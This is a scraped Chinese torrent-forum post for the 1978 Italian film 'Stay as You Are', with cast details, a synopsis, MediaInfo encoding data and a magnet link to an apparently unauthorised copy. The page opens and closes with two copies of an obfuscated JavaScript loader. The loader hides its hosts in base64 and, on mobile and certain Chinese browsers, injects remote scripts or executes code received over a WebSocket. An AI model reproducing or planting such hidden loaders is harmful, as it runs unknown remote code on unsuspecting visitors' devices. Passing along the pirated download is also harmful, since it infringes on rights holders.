你不要走[简繁字幕].Stay.as.You.Are.1978.BluRay.1080p.AC3.x265.10bit 6.61GB

版主小s 22天前 202

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 你不要走 / 绅士与俏妞 / 乱伦之爱 / 不要离开 / Stay as You Are

◎片 名 Così come sei

◎年 代 1978

◎产 地 意大利 / 西班牙

◎类 别 剧情

◎语 言 意大利语

◎上映日期 1978-09-14(意大利)

◎IMDb链接 https://www.imdb.com/title/tt0077373/

◎豆瓣评分 7.1/10 (1368人评价)

◎豆瓣链接 https://movie.douban.com/subject/1295887/

◎片 长 105分钟

◎导 演 阿尔贝托·拉图瓦达 Alberto Lattuada (id:1041744)

◎编 剧 阿尔贝托·拉图瓦达 Alberto Lattuada (id:1041744)

恩里科·奥尔多尼 Enrico Oldoini (id:1048604)

保罗·卡瓦拉 Paolo Cavara (id:1010173)

◎演 员 马塞洛·马斯楚安尼 Marcello Mastroianni (id:1027899)

娜塔莎·金斯基 Nastassja Kinski (id:1004665)

朱丽娅娜·盖兰德拉 Giuliana Calandra (id:1074862)

弗朗西斯科·拉瓦尔 Francisco Rabal (id:1032637)

陈莎莉 Sally Chan (id:1252857)

阿尼娅·皮艾洛丽 Ania Pieroni (id:1329751)

莫妮卡·兰达利 Mónica Randall (id:1145759)

芭芭拉·德·罗西 Barbara De Rossi (id:1023195)

恩尼奥·莫里康内 Ennio Morricone (id:1044688)

◎标 签 意大利 / 伦理 / 爱情 / 意大利电影 / 情色 / 娜塔莎·金斯基 / 1978 / 剧情

◎简 介

朱利奥(马塞洛·马斯楚安尼 Marcello Mastroianni 饰)人到中年,魅力却有增无减,生性风流的他身边常常变换着女伴,日子过得肆意而又自由。某日,朱利奥邂逅了一位名为弗朗西斯卡(娜塔莎·金斯基 Nastassja Kinski 饰)的年轻女学生,弗朗西斯卡的单纯和善良吸引了朱利奥的注意。

情窦初开的懵懂少女怎能禁得住“身经百战”的朱利奥的引诱,很快,两人就坠入了情网,在弗朗西斯卡鲜嫩美好的身体上,朱利奥似乎找回了年轻的感觉,但随之而来的,是另一种隐秘而又古怪的情感。一次偶然中,朱利奥震惊的得知弗朗西斯卡有可能是自己的亲生女儿,巨大的冲击之下,朱利奥离开了弗朗西斯卡,使得后者陷入了绝望和痛苦之中。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 212796693474206148197389110194788340386 (0xA0172703DFA4B55FC2C0A3C1FD4B92A2)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.61 GiB

  8. Duration : 1 h 45 min

  9. Overall bit rate : 8 996 kb/s

  10. Encoded date : UTC 2021-11-08 12:16:00

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 45 min

  20. Bit rate : 8 777 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.177

  30. Stream size : 6.45 GiB (98%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 8777 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=151250 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : AC-3

  44. Format/Info : Audio Coding 3

  45. Commercial name : Dolby Digital

  46. Codec ID : A_AC3

  47. Duration : 1 h 45 min

  48. Bit rate mode : Constant

  49. Bit rate : 192 kb/s

  50. Channel(s) : 2 channels

  51. Channel layout : L R

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 144 MiB (2%)

  56. Title : Italian Dolby Digital Audio 2.0 @ 192 kbps

  57. Language : Italian

  58. Service kind : Complete Main

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 38 min

  67. Bit rate : 13.1 kb/s

  68. Count of elements : 1234

  69. Stream size : 9.26 MiB (0%)

  70. Title : Chs/SUP 简体

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 38 min

  80. Bit rate : 13.7 kb/s

  81. Count of elements : 1234

  82. Stream size : 9.70 MiB (0%)

  83. Title : Cht/SUP 繁体

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Menu

  88. 00:00:00.000 : en:第 01 章

  89. 00:11:24.684 : en:第 02 章

  90. 00:26:31.090 : en:第 03 章

  91. 00:41:39.497 : en:第 04 章

  92. 00:48:53.764 : en:第 05 章

  93. 00:58:05.691 : en:第 06 章

  94. 01:11:30.286 : en:第 07 章

  95. 01:21:55.119 : en:第 08 章

  96. 01:34:20.905 : en:第 09 章




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:DE5B16C8C5B0B8E3C7FE7C1D5F6CB06859C56EAB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};